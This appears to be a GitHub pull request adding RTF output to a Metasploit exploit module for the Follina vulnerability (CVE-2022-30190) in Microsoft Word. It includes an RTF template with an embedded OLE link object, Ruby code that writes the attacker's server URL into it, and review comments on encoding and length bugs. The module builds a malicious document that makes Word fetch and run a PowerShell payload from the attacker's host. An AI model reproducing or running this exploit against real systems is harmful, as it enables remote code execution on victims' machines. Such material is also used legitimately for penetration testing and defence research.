Add rtf support to cve-2022-30190 AKA Follina #16734

Merged
merged 3 commits into from
Aug 25, 2022
Changes from 1 commit
30 changes: 30 additions & 0 deletions data/exploits/CVE-2022-30190/cve_2022_30190_rtf_template.rtf
@@ -0,0 +1,30 @@
{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31506\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe1033\themelang1033\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}
\pard\plain \ltrpar\ql \li0\ri0\sa160\sl259\slmult1\widctlpar\wrapdefault\aspalpha\aspnum\faauto\adjustright\rin0\lin0\itap0\pararsid15608771 \rtlch\fcs1 \af31507\afs22\alang1025 \ltrch\fcs0 \f31506\fs22\lang1033\langfe1033\cgrid\langnp1033\langfenp1033
{\pard\plain \ltrpar\ql \li0\ri0\sa160\sl259\slmult1\widctlpar\wrapdefault\aspalpha\aspnum\faauto\adjustright\rin0\lin0\itap0\pararsid15608771 \rtlch\fcs1 \af31507\afs22\alang1025 \ltrch\fcs0 \f31506\fs22\lang1033\langfe1033\cgrid\langnp1033\langfenp1033
{\object\objautlink\rsltpict\objw4321\objh4321\objscalex1\objscaley1{\*\objclass REPLACE_WITH_URI_STRING}{\*\oleclsid \'7b00000300-0000-0000-C000-000000000046\'7d}{\*\objdata 010500000200000009000000
4f4c45324c696e6b000000000000000000000c0000
d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
fffffffffffffffffdfffffffefffffffeffffff04000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000c6ad98892f1d411a65f0040963251e5000000000000000000000000009e
70f1e98bd80103000000c00200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000
0000000000000000000000006b0100000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000
0000000000000000000006000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000
00000000000000000000000007000000f0000000000000000100000002000000030000000400000005000000fefffffffeffffff08000000090000000a000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020900000001000000000000002a0000000403000000000000c0000000000000460200000021000c0000005f313731383030383936380000000000f90000000903000000000000c00000000000004602000000e0c9ea79f9bace11
8c8200aa004ba90bb20000REPLACE_WITH_URI_STRING_UTF16000000795881f43b1d7f48af2c825dc485276300000000a5ab00030403000000000000c0000000000000460200000021000100000000ffffffff0000000000000000000000000000000000000000ffffffff00000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000100003000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004c00REPLACE_WITH_URI_STRING_ASCII
0000bbbbcccc4cREPLACE_WITH_URI_STRING_UTF16
000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000105000000000000}}}}}
}}}}
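Review bot: the substitution order this template silently depends on is undocumented. The bare token `REPLACE_WITH_URI_STRING` inside `{\*\objclass REPLACE_WITH_URI_STRING}` is a prefix of the two suffixed tokens (`REPLACE_WITH_URI_STRING_ASCII` once, `REPLACE_WITH_URI_STRING_UTF16` twice) embedded in the `\*\objdata` hex stream, so any consumer that replaces the bare token first leaves `_ASCII`/`_UTF16` debris inside the OLE stream and corrupts the object. The field widths are also fixed by the surrounding stream layout (the hex runs before and after each placeholder are sized for a specific padded length), as are the `bbbbcccc4c` bytes that precede the second UTF-16 copy, which read like marker or filler bytes. Suggest a short note at the top of the file, or in the module that consumes it, stating the required replacement order, the padded width each placeholder must be expanded to, and what those marker bytes are for, so the next person editing the blob does not have to rediscover it by diffing against a Word-generated RTF.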
39 changes: 32 additions & 7 deletions modules/exploits/windows/fileformat/word_msdtjs_rce.rb
@@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Powershell
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Post::File

def initialize(info = {})
super(
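Review bot: `include Msf::Post::File` deserves a comment explaining why a fileformat module pulls in a post-exploitation mixin. The module never operates on a session; the only new dependency below is `exploit_data(...)` to read the RTF template from the data directory, and `file_create` already comes from `Msf::Exploit::FILEFORMAT`. If the include exists solely to get `exploit_data`, say so inline (or reach for that helper from wherever it is already available to exploit modules) so a later cleanup does not remove the include and break `build_rtf`.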
@@ -61,6 +62,7 @@ def initialize(info = {})

register_options([
OptPath.new('CUSTOMTEMPLATE', [false, 'A DOCX file that will be used as a template to build the exploit.']),
OptEnum.new('OUTPUT_FORMAT', [true, 'Obfuscate JavaScript content.', 'docx', %w[docx rtf]]),
OptBool.new('OBFUSCATE', [true, 'Obfuscate JavaScript content.', true])
])
end
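Review bot: the description on the new `OUTPUT_FORMAT` option is a copy-paste of the `OBFUSCATE` description ("Obfuscate JavaScript content.") and is wrong for an output-format selector. Suggest something like `OptEnum.new('OUTPUT_FORMAT', [true, 'Output file format for the generated document', 'docx', %w[docx rtf]])`. While here, note that `FILENAME` is used as-is by `file_create` in both branches, so its default extension should be checked against the chosen format; a `.docx` name for an RTF body will still open in Word but is confusing for the operator.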
@@ -174,27 +176,50 @@ def pack_docx
Msf::Util::EXE.to_zip(@docx)
end

def primer
print_status('Generating a malicious docx file')
def build_rtf
print_status('Generating a malicious rtf file')

@proto = (datastore['SSL'] ? 'https' : 'http')
uri = "#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html"
uri_space = 76
if uri.length > 76
fail_with(Failure::BadConfig, 'The total URI must be under 75 characters')
end
uri_ascii = uri.each_byte.map { |b| b.to_s(16) }.join
uri_ascii << '0' * ((uri_space * 2) - uri_ascii.length)
# This is terrible, but will work for a test
uri_utf16 = uri.each_byte.map { |b| '00' + b.to_s(16) }.join
uri_utf16 << '0' * ((uri_space * 4) - uri_utf16.length)
rtf_file_data = exploit_data('CVE-2022-30190', 'cve_2022_30190_rtf_template.rtf')
rtf_file_data.gsub!('REPLACE_WITH_URI_STRING_ASCII', uri_ascii)
rtf_file_data.gsub!('REPLACE_WITH_URI_STRING_UTF16', uri_utf16)
rtf_file_data.gsub!('REPLACE_WITH_URI_STRING', uri)
file_create(rtf_file_data)
end

def build_docx
print_status('Generating a malicious docx file')

template_path = get_template_path
unless File.extname(template_path).downcase.end_with?('.docx')
fail_with(Failure::BadConfig, 'Template is not a docx file!')
end

print_status("Using template '#{template_path}'")
@docx = unpack_docx(template_path)

print_status('Injecting payload in docx document')
inject_docx

print_status("Finalizing docx '#{datastore['FILENAME']}'")
file_create(pack_docx)
end

@payload_data = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, exec_in_place: true)
def primer
@proto = (datastore['SSL'] ? 'https' : 'http')

if datastore['OUTPUT_FORMAT'] == 'rtf'
build_rtf
else
build_docx
end
@payload_data = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, exec_in_place: true)
super
end

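Review bot: the UTF-16 encoding in `build_rtf` has the wrong byte order for the stream it is written into, and the length check does not match its own error message. `uri_utf16 = uri.each_byte.map { |b| '00' + b.to_s(16) }.join` emits each character as a big-endian pair (`0068` for `h`), while every UTF-16 string in the template is little-endian (`52006f006f007400` spells `Root`). If this is deliberate, because the `b20000` prefix in front of the `_UTF16` placeholder is one byte short and the leading `00` completes that DWORD, then the comment should say exactly that rather than "This is terrible, but will work for a test"; otherwise use `uri.encode('UTF-16LE').unpack1('H*')` and fix the template offset. Either way, `b.to_s(16)` should be `'%02x' % b` so a byte below 0x10 cannot produce a single hex digit and shift the whole stream (harmless for printable ASCII today, but the padding arithmetic below assumes two digits per byte). Separately, `if uri.length > 76` rejects only 77+ characters but the message says "must be under 75 characters"; pick one limit and reuse `uri_space` in both the comparison and the message. Finally, `@proto` is now assigned both in `primer` and again inside `build_rtf`; the copy in `build_rtf` can go.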